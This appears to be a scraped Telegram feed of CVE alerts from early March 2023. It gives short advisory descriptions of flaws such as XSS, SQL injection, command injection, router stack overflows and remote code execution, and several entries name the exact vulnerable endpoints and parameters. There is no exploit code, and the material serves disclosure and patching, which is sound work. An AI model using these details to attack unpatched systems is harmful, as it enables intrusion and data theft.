🚨 CVE-2023-20855VMware vRealize Orchestrator contains an XML External Entity (XXE) vulnerability. A malicious actor, with non-administrative access to vRealize Orchestrator, may be able to use specially crafted input to bypass XML parsing restrictions leading to access to sensitive information or possible escalation of privileges.🎖@cveNotify |
|
| 2023-03-03 16:29:58 |
🚨 CVE-2023-20858VMware Carbon Black App Control 8.7.x prior to 8.7.8, 8.8.x prior to 8.8.6, and 8.9.x.prior to 8.9.4 contain an injection vulnerability. A malicious actor with privileged access to the App Control administration console may be able to use specially crafted input allowing access to the underlying server operating system.🎖@cveNotify |
|
| 2023-03-03 16:29:57 |
🚨 CVE-2020-35137** DISPUTED ** The MobileIron agents through 2021-03-22 for Android and iOS contain a hardcoded API key, used to communicate with the MobileIron SaaS discovery API, as demonstrated by Mobile@Work (aka com.mobileiron). The key is in com/mobileiron/registration/RegisterActivity.java and can be used for api/v1/gateway/customers/servers requests. NOTE: Vendor states that this is an opt-in feature to the product - it is not enabled by default and customers cannot enable it without an explicit email to support. At this time, they do not plan change to make any changes to this feature.🎖@cveNotify |
|
| 2023-03-03 16:29:53 |
🚨 CVE-2022-45551An issue discovered in Shenzhen Zhiboton Electronics ZBT WE1626 Router v 21.06.18 allows attackers to escalate privileges via WGET command to the Network Diagnosis endpoint.🎖@cveNotify |
|
| 2023-03-03 16:29:52 |
🚨 CVE-2022-45552An Insecure Permissions vulnerability in Shenzhen Zhiboton Electronics ZBT WE1626 Router v 21.06.18 allows attackers to obtain sensitive information via SPI bus interface connected to pinout of the NAND flash memory.🎖@cveNotify |
|
| 2023-03-03 16:29:51 |
🚨 CVE-2022-45553An issue discovered in Shenzhen Zhibotong Electronics WBT WE1626 Router v 21.06.18 allows attacker to execute arbitrary commands via serial connection to the UART port.🎖@cveNotify |
|
| 2023-03-03 16:29:50 |
🚨 CVE-2023-27560Math/PrimeField.php in phpseclib through 2.0.41 has an infinite loop with composite primefields.🎖@cveNotify |
|
| 2023-03-03 16:29:49 |
🚨 CVE-2023-0577Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ASOS Information Technologies SOBIAD allows Cross-Site Scripting (XSS).This issue affects SOBIAD: before 23.02.01.🎖@cveNotify |
|
| 2023-03-03 11:29:54 |
🚨 CVE-2023-1165A vulnerability was found in Zhong Bang CRMEB Java 1.3.4. It has been classified as critical. This affects an unknown part of the file /api/admin/system/store/order/list. The manipulation of the argument keywords leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier VDB-222261 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-03 11:29:53 |
🚨 CVE-2023-0577Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ASOS Information Technologies SOBIAD allows Cross-Site Scripting (XSS).This issue affects SOBIAD: before 23.02.01.🎖@cveNotify |
|
| 2023-03-03 11:29:49 |
🚨 CVE-2023-0578Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ASOS Information Technologies Book Cites allows Cross-Site Scripting (XSS).This issue affects Book Cites: before 23.01.05.🎖@cveNotify |
|
| 2023-03-03 11:29:48 |
🚨 CVE-2023-1162A vulnerability, which was classified as critical, was found in DrayTek Vigor 2960 1.5.1.4. Affected is the function sub_1225C of the file mainfunction.cgi. The manipulation leads to command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-222258 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-03 11:29:47 |
🚨 CVE-2023-1163A vulnerability has been found in DrayTek Vigor 2960 1.5.1.4 and classified as problematic. Affected by this vulnerability is the function sub_1DA58 of the file mainfunction.cgi. The manipulation leads to path traversal. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-222259.🎖@cveNotify |
|
| 2023-03-03 11:29:46 |
🚨 CVE-2023-27560Math/PrimeField.php in phpseclib through 2.0.41 has an infinite loop with composite primefields.🎖@cveNotify |
|
| 2023-03-03 07:29:59 |
🚨 CVE-2019-14443An issue was discovered in Libav 12.3. Division by zero in range_decode_culshift in libavcodec/apedec.c allows remote attackers to cause a denial of service (application crash), as demonstrated by avconv.🎖@cveNotify |
|
| 2023-03-03 07:29:57 |
🚨 CVE-2019-14442In mpc8_read_header in libavformat/mpc8.c in Libav 12.3, an input file can result in an avio_seek infinite loop and hang, with 100% CPU consumption. Attackers could leverage this vulnerability to cause a denial of service via a crafted file.🎖@cveNotify |
|
| 2023-03-03 07:29:56 |
🚨 CVE-2020-12000The affected product is vulnerable to the handling of serialized data. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data on the Ignition 8 Gateway (versions prior to 8.0.10) and Ignition 7 Gateway (versions prior to 7.9.14), allowing an attacker to obtain sensitive information.🎖@cveNotify |
|
| 2023-03-03 07:29:54 |
🚨 CVE-2019-14431In MatrixSSL 3.8.3 Open through 4.2.1 Open, the DTLS server mishandles incoming network messages leading to a heap-based buffer overflow of up to 256 bytes and possible Remote Code Execution in parseSSLHandshake in sslDecode.c. During processing of a crafted packet, the server mishandles the fragment length value provided in the DTLS message.🎖@cveNotify |
|
| 2023-03-03 07:29:52 |
🚨 CVE-2020-13964An issue was discovered in Roundcube Webmail before 1.3.12 and 1.4.x before 1.4.5. include/rcmail_output_html.php allows XSS via the username template object.🎖@cveNotify |
|
| 2023-03-03 07:29:51 |
🚨 CVE-2020-13428A heap-based buffer overflow in the hxxx_AnnexB_to_xVC function in modules/packetizer/hxxx_nal.c in VideoLAN VLC media player before 3.0.11 for macOS/iOS allows remote attackers to cause a denial of service (application crash) or execute arbitrary code via a crafted H.264 Annex-B video (.avi for example) file.🎖@cveNotify |
|
| 2023-03-03 07:29:49 |
🚨 CVE-2020-0202In onHandleIntent of TraceService.java, there is a possible bypass of developer settings requirements for capturing system traces due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android Versions: Android-11 Android ID: A-142936525🎖@cveNotify |
|
| 2023-03-03 07:29:48 |
🚨 CVE-2020-0215In onCreate of ConfirmConnectActivity.java, there is a possible leak of Bluetooth information due to a permissions bypass. This could lead to local escalation of privilege that exposes a pairing Bluetooth MAC address with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android Versions: Android-9 Android-10 Android-11 Android-8.0 Android-8.1 Android ID: A-140417248🎖@cveNotify |
|
| 2023-03-03 01:29:53 |
🚨 CVE-2022-26841Insufficient control flow management for the Intel(R) SGX SDK software for Linux before version 2.16.100.1 may allow an authenticated user to potentially enable information disclosure via local access.🎖@cveNotify |
|
| 2023-03-03 01:29:52 |
🚨 CVE-2022-26843Insufficient visual distinction of homoglyphs presented to user in the Intel(R) oneAPI DPC++/C++ Compiler before version 2022.1 for Intel(R) oneAPI Toolkits before version 2022.2 may allow an unauthenticated user to potentially enable escalation of privilege via network access.🎖@cveNotify |
|
| 2023-03-03 01:29:48 |
🚨 CVE-2023-26242afu_mmio_region_get_by_offset in drivers/fpga/dfl-afu-region.c in the Linux kernel through 6.1.12 has an integer overflow.🎖@cveNotify |
|
| 2023-03-03 01:29:47 |
🚨 CVE-2014-125089A vulnerability was found in cention-chatserver 3.8.0-rc1. It has been declared as problematic. Affected by this vulnerability is the function _formatBody of the file lib/InternalChatProtocol.fe. The manipulation of the argument body leads to cross site scripting. The attack can be launched remotely. Upgrading to version 3.9 is able to address this issue. The name of the patch is c4c0258bbd18f6915f97f91d5fee625384096a26. It is recommended to upgrade the affected component. The identifier VDB-221497 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-03 01:29:46 |
🚨 CVE-2022-40633A malicious actor can clone access cards used to open control cabinets secured with Rittal CMC III locks.🎖@cveNotify |
|
| 2023-03-03 01:29:44 |
🚨 CVE-2023-26265The Borg theme before 1.1.19 for Backdrop CMS does not sufficiently sanitize path arguments that are passed in via a URL. The function borg_preprocess_page in the file template.php does not properly sanitize incoming path arguments before using them.🎖@cveNotify |
|
| 2023-03-03 01:29:43 |
🚨 CVE-2015-10082A vulnerability classified as problematic has been found in UIKit0 libplist 1.12. This affects the function plist_from_xml of the file src/xplist.c of the component XML Handler. The manipulation leads to xml external entity reference. The name of the patch is c086cb139af7c82845f6d565e636073ff4b37440. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-221499.🎖@cveNotify |
|
| 2023-03-03 01:29:42 |
🚨 CVE-2023-26266In AFL++ 4.05c, the CmpLog component uses the current working directory to resolve and execute unprefixed fuzzing targets, allowing code execution.🎖@cveNotify |
|
| 2023-03-03 01:29:41 |
🚨 CVE-2015-10085A vulnerability was found in GoPistolet. It has been declared as problematic. This vulnerability affects unknown code of the component MTA. The manipulation leads to denial of service. Continious delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. The name of the patch is b91aa4674d460993765884e8463c70e6d886bc90. It is recommended to apply a patch to fix this issue. VDB-221506 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-02 23:29:54 |
🚨 CVE-2023-25158GeoTools is an open source Java library that provides tools for geospatial data. GeoTools includes support for OGC Filter expression language parsing, encoding and execution against a range of datastore. SQL Injection Vulnerabilities have been found when executing OGC Filters with JDBCDataStore implementations. Users are advised to upgrade to either version 27.4 or to 28.2 to resolve this issue. Users unable to upgrade may disable `encode functions` for PostGIS DataStores or enable `prepared statements` for JDBCDataStores as a partial mitigation.🎖@cveNotify |
|
| 2023-03-02 23:29:53 |
🚨 CVE-2023-25657Nautobot is a Network Source of Truth and Network Automation Platform. All users of Nautobot versions earlier than 1.5.7 are impacted by a remote code execution vulnerability. Nautobot did not properly sandbox Jinja2 template rendering. In Nautobot 1.5.7 has enabled sandboxed environments for the Jinja2 template engine used internally for template rendering for the following objects: `extras.ComputedField`, `extras.CustomLink`, `extras.ExportTemplate`, `extras.Secret`, `extras.Webhook`. While no active exploits of this vulnerability are known this change has been made as a preventative measure to protect against any potential remote code execution attacks utilizing maliciously crafted template code. This change forces the Jinja2 template engine to use a `SandboxedEnvironment` on all new installations of Nautobot. This addresses any potential unsafe code execution everywhere the helper function `nautobot.utilities.utils.render_jinja2` is called. Additionally, the documentation that had previously suggesting the direct use of `jinja2.Template` has been revised to suggest `render_jinja2`. Users are advised to upgrade to Nautobot 1.5.7 or newer. For users that are unable to upgrade to the latest release of Nautobot, you may add the following setting to your `nautobot_config.py` to apply the sandbox environment enforcement: `TEMPLATES[1]["OPTIONS"]["environment"] = "jinja2.sandbox.SandboxedEnvironment"` After applying this change, you must restart all Nautobot services, including any Celery worker processes. **Note:** *Nautobot specifies two template engines by default, the first being “django” for the Django built-in template engine, and the second being “jinja” for the Jinja2 template engine. This recommended setting will update the second item in the list of template engines, which is the Jinja2 engine.* For users that are unable to immediately update their configuration such as if a Nautobot service restart is too disruptive to operations, access to provide custom Jinja2 template values may be mitigated using permissions to restrict “change” (write) actions to the affected object types listed in the first section. **Note:** *This solution is intended to be stopgap until you can successfully update your `nautobot_config.py` or upgrade your Nautobot instance to apply the sandboxed environment enforcement.*🎖@cveNotify |
|
| 2023-03-02 23:29:52 |
🚨 CVE-2023-0656A Stack-based buffer overflow vulnerability in the SonicOS allows a remote unauthenticated attacker to cause Denial of Service (DoS), which could cause an impacted firewall to crash.🎖@cveNotify |
|
| 2023-03-02 23:29:51 |
🚨 CVE-2023-1101SonicOS SSLVPN improper restriction of excessive MFA attempts vulnerability allows an authenticated attacker to use excessive MFA codes.🎖@cveNotify |
|
| 2023-03-02 23:29:47 |
🚨 CVE-2022-41073Windows Print Spooler Elevation of Privilege Vulnerability.🎖@cveNotify |
|
| 2023-03-02 23:29:46 |
🚨 CVE-2022-41091Windows Mark of the Web Security Feature Bypass Vulnerability. This CVE ID is unique from CVE-2022-41049.🎖@cveNotify |
|
| 2023-03-02 23:29:45 |
🚨 CVE-2022-41128Windows Scripting Languages Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-41118.🎖@cveNotify |
|
| 2023-03-02 23:29:43 |
🚨 CVE-2022-41040Microsoft Exchange Server Elevation of Privilege Vulnerability.🎖@cveNotify |
|
| 2023-03-02 23:29:39 |
🚨 CVE-2022-41082Microsoft Exchange Server Remote Code Execution Vulnerability.🎖@cveNotify |
|
| 2023-03-02 23:29:38 |
🚨 CVE-2023-25810Uptime Kuma is a self-hosted monitoring tool. In versions prior to 1.20.0 the Uptime Kuma status page allows a persistent XSS attack. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-03-02 23:29:37 |
🚨 CVE-2022-46501Accruent LLC Maintenance Connection 2021 (all) & 2022.2 was discovered to contain a SQL injection vulnerability via the E-Mail to Work Order function.🎖@cveNotify |
|
| 2023-03-02 23:29:36 |
🚨 CVE-2023-22381A code injection vulnerability was identified in GitHub Enterprise Server that allowed setting arbitrary environment variables from a single environment variable value in GitHub Actions when using a Windows based runner. To exploit this vulnerability, an attacker would need existing permission to control the value of environment variables for use with GitHub Actions. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.8.0 and was fixed in versions 3.4.15, 3.5.12, 3.6.8, 3.7.5. This vulnerability was reported via the GitHub Bug Bounty program.🎖@cveNotify |
|
| 2023-03-02 22:30:24 |
🚨 CVE-2023-26471XWiki Platform is a generic wiki platform. Starting in version 11.6-rc-1, comments are supposed to be executed with the right of superadmin but in restricted mode (anything dangerous is disabled), but the async macro does not take into account the restricted mode. This means that any user with comment right can use the async macro to make it execute any wiki content with the right of superadmin. This has been patched in XWiki 14.9, 14.4.6, and 13.10.10. The only known workaround consists of applying a patch and rebuilding and redeploying `org.xwiki.platform:xwiki-platform-rendering-async-macro`.🎖@cveNotify |
|
| 2023-03-02 22:30:19 |
🚨 CVE-2023-26472XWiki Platform is a generic wiki platform. Starting in version 6.2-milestone-1, one can execute any wiki content with the right of IconThemeSheet author by creating an icon theme with certain content. This can be done by creating a new page or even through the user profile for users not having edit right. The issue has been patched in XWiki 14.9, 14.4.6, and 13.10.10. An available workaround is to fix the bug in the page `IconThemesCode.IconThemeSheet` by applying a modification from commit 48caf7491595238af2b531026a614221d5d61f38.🎖@cveNotify |
|
| 2023-03-02 22:30:13 |
🚨 CVE-2023-26473XWiki Platform is a generic wiki platform. Starting in version 1.3-rc-1, any user with edit right can execute arbitrary database select and access data stored in the database. The problem has been patched in XWiki 13.10.11, 14.4.7, and 14.10. There is no workaround for this vulnerability other than upgrading.🎖@cveNotify |
|
| 2023-03-02 22:30:09 |
🚨 CVE-2023-26474XWiki Platform is a generic wiki platform. Starting in version 13.10, it's possible to use the right of an existing document content author to execute a text area property. This has been patched in XWiki 14.10, 14.4.7, and 13.10.11. There are no known workarounds.🎖@cveNotify |
|
| 2023-03-02 22:30:05 |
🚨 CVE-2023-26475XWiki Platform is a generic wiki platform. Starting in version 2.3-milestone-1, the annotation displayer does not execute the content in a restricted context. This allows executing anything with the right of the author of any document by annotating the document. This has been patched in XWiki 13.10.11, 14.4.7 and 14.10. There is no easy workaround except to upgrade.🎖@cveNotify |
|
| 2023-03-02 22:30:01 |
🚨 CVE-2023-26476XWiki Platform is a generic wiki platform. Starting in version 3.2-m3, users can deduce the content of the password fields by repeated call to `LiveTableResults` and `WikisLiveTableResultsMacros`. The issue can be fixed by upgrading to versions 14.7-rc-1, 13.4.4, or 13.10.9 and higher, or in version >= 3.2M3 by applying the patch manually on `LiveTableResults` and `WikisLiveTableResultsMacros`.🎖@cveNotify |
|
| 2023-03-02 22:29:58 |
🚨 CVE-2023-0949Cross-site Scripting (XSS) - Reflected in GitHub repository modoboa/modoboa prior to 2.0.5.🎖@cveNotify |
|
| 2023-03-02 22:29:57 |
🚨 CVE-2023-26314The mono package before 6.8.0.105+dfsg-3.3 for Debian allows arbitrary code execution because the application/x-ms-dos-executable MIME type is associated with an un-sandboxed Mono CLR interpreter.🎖@cveNotify |
|
| 2023-03-02 22:29:55 |
🚨 CVE-2023-24108MvcTools 6d48cd6830fc1df1d8c9d61caa1805fd6a1b7737 was discovered to contain a code execution backdoor via the request package (requirements.txt). This vulnerability allows attackers to access sensitive user information and execute arbitrary code.🎖@cveNotify |
|
| 2023-03-02 22:29:53 |
🚨 CVE-2023-24107hour_of_code_python_2015 commit 520929797b9ca43bb818b2e8f963fb2025459fa3 was discovered to contain a code execution backdoor via the request package (requirements.txt). This vulnerability allows attackers to access sensitive user information and execute arbitrary code.🎖@cveNotify |
|
| 2023-03-02 22:29:52 |
🚨 CVE-2023-0947Path Traversal in GitHub repository flatpressblog/flatpress prior to 1.3.🎖@cveNotify |
|
| 2023-03-02 22:29:51 |
🚨 CVE-2022-44216Gnuboard 5.5.4 and 5.5.5 is vulnerable to Insecure Permissions. An attacker can change password of all users without knowing victim's original password.🎖@cveNotify |
|
| 2023-03-02 22:29:44 |
🚨 CVE-2021-32851Mind-elixir is a free, open source mind map core. Prior to version 0.18.1, mind-elixir is prone to cross-site scripting when handling untrusted menus. This issue is patched in version 0.18.1🎖@cveNotify |
|
| 2023-03-02 22:29:41 |
🚨 CVE-2021-32850jQuery MiniColors is a color picker built on jQuery. Prior to version 2.3.6, jQuery MiniColors is prone to cross-site scripting when handling untrusted color names. This issue is patched in version 2.3.6.🎖@cveNotify |
|
| 2023-03-02 20:29:49 |
🚨 CVE-2021-42521There is a NULL pointer dereference vulnerability in VTK before 9.2.5, and it lies in IO/Infovis/vtkXMLTreeReader.cxx. The vendor didn't check the return value of libxml2 API 'xmlDocGetRootElement', and try to dereference it. It is unsafe as the return value can be NULL and that NULL pointer dereference may crash the application.🎖@cveNotify |
|
| 2023-03-02 20:29:48 |
🚨 CVE-2019-3418All versions up to V1.1.10P3T18 of ZTE ZXHN F670 product are impacted by cross-site scripting vulnerability (XSS). Due to incomplete input validation, an authorized user can exploit this vulnerability to execute malicious scripts.🎖@cveNotify |
|
| 2023-03-02 20:29:47 |
🚨 CVE-2019-15081OpenCart 3.x, when the attacker has login access to the admin panel, allows stored XSS within the Source/HTML editing feature of the Categories, Product, and Information pages.🎖@cveNotify |
|
| 2023-03-02 20:29:45 |
🚨 CVE-2018-17790Prospecta Master Data Online (MDO) 2.0 has Stored XSS.🎖@cveNotify |
|
| 2023-03-02 20:29:44 |
🚨 CVE-2019-14934An issue was discovered in PDFResurrect before 0.18. pdf_load_pages_kids in pdf.c doesn't validate a certain size value, which leads to a malloc failure and out-of-bounds write.🎖@cveNotify |
|
| 2023-03-02 20:29:43 |
🚨 CVE-2019-14980In ImageMagick 7.x before 7.0.8-42 and 6.x before 6.9.10-42, there is a use after free vulnerability in the UnmapBlob function that allows an attacker to cause a denial of service by sending a crafted file.🎖@cveNotify |
|
| 2023-03-02 20:29:41 |
🚨 CVE-2019-13417Search Guard versions before 24.0 had an issue that field caps and mapping API leak field names (but not values) for fields which are not allowed for the user when field level security (FLS) is activated.🎖@cveNotify |
|
| 2023-03-02 20:29:40 |
🚨 CVE-2019-13418Search Guard versions before 24.0 had an issue that values of string arrays in documents are not properly anonymized.🎖@cveNotify |
|
| 2023-03-02 20:29:39 |
🚨 CVE-2019-15052The HTTP client in Gradle before 5.6 sends authentication credentials originally destined for the configured host. If that host returns a 30x redirect, Gradle also sends those credentials to all subsequent hosts that the request redirects to. This is similar to CVE-2018-1000007.🎖@cveNotify |
|
| 2023-03-02 20:29:38 |
🚨 CVE-2019-15120The Kunena extension before 5.1.14 for Joomla! allows XSS via BBCode.🎖@cveNotify |
|
| 2023-03-02 18:29:38 |
🚨 CVE-2023-22920A security misconfiguration vulnerability exists in the Zyxel LTE3316-M604 firmware version V2.00(ABMP.6)C0 due to a factory default misconfiguration intended for testing purposes. A remote attacker could leverage this vulnerability to access an affected device using Telnet.🎖@cveNotify |
|
| 2023-03-02 18:29:37 |
🚨 CVE-2023-22984A Vulnerability was discovered in Axis 207W network camera. There is a reflected XSS vulnerability in the web administration portal, which allows an attacker to execute arbitrary JavaScript via URL.🎖@cveNotify |
|
| 2023-03-02 16:29:50 |
🚨 CVE-2022-34843Integer overflow in the Intel(R) Trace Analyzer and Collector software before version 2021.5 may allow an authenticated user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2023-03-02 16:29:48 |
🚨 CVE-2022-32575Out-of-bounds write in the Intel(R) Trace Analyzer and Collector software before version 2021.5 may allow an authenticated user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2023-03-02 16:29:47 |
🚨 CVE-2022-36398Uncontrolled search path in the Intel(R) Battery Life Diagnostic Tool software before version 2.2.0 may allow an authenticated user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2023-03-02 16:29:46 |
🚨 CVE-2022-36278Insufficient control flow management in the Intel(R) Battery Life Diagnostic Tool software before version 2.2.0 may allow an authenticated user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2023-03-02 16:29:44 |
🚨 CVE-2022-34153Improper initialization in the Intel(R) Battery Life Diagnostic Tool software before version 2.2.0 may allow an authenticated user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2023-03-02 16:29:43 |
🚨 CVE-2023-23315The PrestaShop e-commerce platform module stripejs contains a Blind SQL injection vulnerability up to version 4.5.5. The method `stripejsValidationModuleFrontController::initContent()` has sensitive SQL calls that can be executed with a trivial http call and exploited to forge a SQL injection.🎖@cveNotify |
|
| 2023-03-02 16:29:41 |
🚨 CVE-2023-27372SPIP before 4.2.1 allows Remote Code Execution via form values in the public area because serialization is mishandled. The fixed versions are 3.2.18, 4.0.10, 4.1.8, and 4.2.1.🎖@cveNotify |
|
| 2023-03-02 16:29:40 |
🚨 CVE-2021-33226** DISPUTED ** Buffer Overflow vulnerability in Saltstack v.3003 and before allows attacker to execute arbitrary code via the func variable in salt/salt/modules/status.py file. NOTE: this is disputed by third parties because an attacker cannot influence the eval input🎖@cveNotify |
|
| 2023-03-02 16:29:39 |
🚨 CVE-2022-41973multipath-tools 0.7.7 through 0.9.x before 0.9.2 allows local users to obtain root access, as exploited in conjunction with CVE-2022-41974. Local users able to access /dev/shm can change symlinks in multipathd due to incorrect symlink handling, which could lead to controlled file writes outside of the /dev/shm directory. This could be used indirectly for local privilege escalation to root.🎖@cveNotify |
|
| 2023-03-02 16:29:37 |
🚨 CVE-2022-41974multipath-tools 0.7.0 through 0.9.x before 0.9.2 allows local users to obtain root access, as exploited alone or in conjunction with CVE-2022-41973. Local users able to write to UNIX domain sockets can bypass access controls and manipulate the multipath setup. This can lead to local privilege escalation to root. This occurs because an attacker can repeat a keyword, which is mishandled because arithmetic ADD is used instead of bitwise OR.🎖@cveNotify |
|
| 2023-03-02 16:29:36 |
🚨 CVE-2022-29523Improper conditions check in the Open CAS software maintained by Intel(R) before version 22.3.1 may allow an authenticated user to potentially enable denial of service via local access.🎖@cveNotify |
|
| 2023-03-02 16:16:50 |
https://t.me/malwr |
|
| 2023-03-02 13:29:44 |
🚨 CVE-2021-3854Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Glox Technology Useroam Hotspot allows SQL Injection. This issue affects Useroam Hotspot: before 5.1.0.15.🎖@cveNotify |
|
| 2023-03-02 12:29:43 |
🚨 CVE-2021-45478Improper Handling of Parameters vulnerability in Bordam Information Technologies Library Automation System allows Collect Data as Provided by Users.This issue affects Library Automation System: before 19.2.🎖@cveNotify |
|
| 2023-03-02 12:29:42 |
🚨 CVE-2021-45479Improper Neutralization of Input During Web Page Generation vulnerability in Yordam Information Technologies Library Automation System allows Stored XSS.This issue affects Library Automation System: before 19.2.🎖@cveNotify |
|
| 2023-03-02 12:29:41 |
🚨 CVE-2023-1151A vulnerability was found in SourceCodester Electronic Medical Records System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file administrator.php of the component Cookie Handler. The manipulation of the argument userid leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-222163.🎖@cveNotify |
|
| 2023-03-02 07:29:57 |
🚨 CVE-2023-0196NVIDIA CUDA Toolkit SDK contains a bug in cuobjdump, where a local user running the tool against an ill-formed binary may cause a null- pointer dereference, which may result in a limited denial of service.🎖@cveNotify |
|
| 2023-03-02 07:29:56 |
🚨 CVE-2023-0228Improper Authentication vulnerability in ABB Symphony Plus S+ Operations allows Man in the Middle Attack.This issue affects Symphony Plus S+ Operations: from 2.X through 2.1 SP2, 2.2, from 3.X through 3.3 SP1, 3.3 SP2.🎖@cveNotify |
|
| 2023-03-02 07:29:55 |
🚨 CVE-2023-1106Cross-site Scripting (XSS) - Reflected in GitHub repository flatpressblog/flatpress prior to 1.3.🎖@cveNotify |
|
| 2023-03-02 07:29:54 |
🚨 CVE-2023-1107Cross-site Scripting (XSS) - Stored in GitHub repository flatpressblog/flatpress prior to 1.3.🎖@cveNotify |
|
| 2023-03-02 07:29:51 |
🚨 CVE-2023-0739Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition') in GitHub repository answerdev/answer prior to 1.0.4.🎖@cveNotify |
|
| 2023-03-02 07:29:50 |
🚨 CVE-2023-0678Missing Authorization in GitHub repository phpipam/phpipam prior to v1.5.1.🎖@cveNotify |
|
| 2023-03-02 07:29:49 |
🚨 CVE-2023-0566Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in froxlor/froxlor prior to 2.0.10.🎖@cveNotify |
|
| 2023-03-02 07:29:48 |
🚨 CVE-2023-0298Incorrect Authorization in GitHub repository firefly-iii/firefly-iii prior to 5.8.0.🎖@cveNotify |
|
| 2023-03-02 07:29:44 |
🚨 CVE-2022-4803Authorization Bypass Through User-Controlled Key in GitHub repository usememos/memos prior to 0.9.1.🎖@cveNotify |
|
| 2023-03-02 07:29:43 |
🚨 CVE-2023-0053SAUTER Controls Nova 200–220 Series with firmware version 3.3-006 and prior and BACnetstac version 4.2.1 and prior have only FTP and Telnet available for device management. Any sensitive information communicated through these protocols, such as credentials, is sent in cleartext. An attacker could obtain sensitive information such as user credentials to gain access to the system.🎖@cveNotify |
|
| 2023-03-02 07:29:39 |
🚨 CVE-2023-26046teler-waf is a Go HTTP middleware that provides teler IDS functionality to protect against web-based attacks. In teler-waf prior to version 0.1.1 is vulnerable to bypassing common web attack rules when a specific HTML entities payload is used. This vulnerability allows an attacker to execute arbitrary JavaScript code on the victim's browser and compromise the security of the web application. The vulnerability exists due to teler-waf failure to properly sanitize and filter HTML entities in user input. An attacker can exploit this vulnerability to bypass common web attack threat rules in teler-waf and launch cross-site scripting (XSS) attacks. The attacker can execute arbitrary JavaScript code on the victim's browser and steal sensitive information, such as login credentials and session tokens, or take control of the victim's browser and perform malicious actions. This issue has been fixed in version 0.1.1.🎖@cveNotify |
|
| 2023-03-02 07:29:38 |
🚨 CVE-2022-4798Authorization Bypass Through User-Controlled Key in GitHub repository usememos/memos prior to 0.9.1.🎖@cveNotify |
|
| 2023-03-02 07:29:37 |
🚨 CVE-2022-4811Incorrect Authorization in GitHub repository usememos/memos prior to 0.9.1.🎖@cveNotify |
|
| 2023-03-02 00:29:50 |
🚨 CVE-2020-5026IBM Financial Transaction Manager for Digital Payments for Multi-Platform 3.2.0 through 3.2.7 could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. IBM X-Force ID: 193662.🎖@cveNotify |
|
| 2023-03-02 00:29:49 |
🚨 CVE-2023-22738vantage6 is a privacy preserving federated learning infrastructure for secure insight exchange. Assigning existing users to a different organizations is currently possible. It may lead to unintended access: if a user from organization A is accidentally assigned to organization B, they will retain their permissions and therefore might be able to access stuff they should not be allowed to access. This issue is patched in version 3.8.0.🎖@cveNotify |
|
| 2023-03-02 00:29:48 |
🚨 CVE-2023-24117Jensen of Scandinavia Eagle 1200AC V15.03.06.33_en was discovered to contain a stack overflow via the wepauth_5g parameter at /goform/WifiBasicSet.🎖@cveNotify |
|
| 2023-03-02 00:29:44 |
🚨 CVE-2023-24119Jensen of Scandinavia Eagle 1200AC V15.03.06.33_en was discovered to contain a stack overflow via the ssid parameter at /goform/WifiBasicSet.🎖@cveNotify |
|
| 2023-03-02 00:29:43 |
🚨 CVE-2023-24120Jensen of Scandinavia Eagle 1200AC V15.03.06.33_en was discovered to contain a stack overflow via the wrlEn_5g parameter at /goform/WifiBasicSet.🎖@cveNotify |
|
| 2023-03-02 00:29:42 |
🚨 CVE-2023-24122Jensen of Scandinavia Eagle 1200AC V15.03.06.33_en was discovered to contain a stack overflow via the ssid_5g parameter at /goform/WifiBasicSet.🎖@cveNotify |
|
| 2023-03-02 00:29:38 |
🚨 CVE-2023-24123Jensen of Scandinavia Eagle 1200AC V15.03.06.33_en was discovered to contain a stack overflow via the wepauth parameter at /goform/WifiBasicSet.🎖@cveNotify |
|
| 2023-03-02 00:29:37 |
🚨 CVE-2023-24125Jensen of Scandinavia Eagle 1200AC V15.03.06.33_en was discovered to contain a stack overflow via the wepkey2_5g parameter at /goform/WifiBasicSet.🎖@cveNotify |
|
| 2023-03-02 00:29:36 |
🚨 CVE-2023-24127Jensen of Scandinavia Eagle 1200AC V15.03.06.33_en was discovered to contain a stack overflow via the wepkey1 parameter at /goform/WifiBasicSet.🎖@cveNotify |
|
| 2023-03-01 22:30:04 |
🚨 CVE-2023-24129Jensen of Scandinavia Eagle 1200AC V15.03.06.33_en was discovered to contain a stack overflow via the wepkey4 parameter at /goform/WifiBasicSet.🎖@cveNotify |
|
| 2023-03-01 22:30:03 |
🚨 CVE-2023-24130Jensen of Scandinavia Eagle 1200AC V15.03.06.33_en was discovered to contain a stack overflow via the wepkey parameter at /goform/WifiBasicSet.🎖@cveNotify |
|
| 2023-03-01 22:30:01 |
🚨 CVE-2023-24131Jensen of Scandinavia Eagle 1200AC V15.03.06.33_en was discovered to contain a stack overflow via the wepkey1_5g parameter at /goform/WifiBasicSet.🎖@cveNotify |
|
| 2023-03-01 22:30:00 |
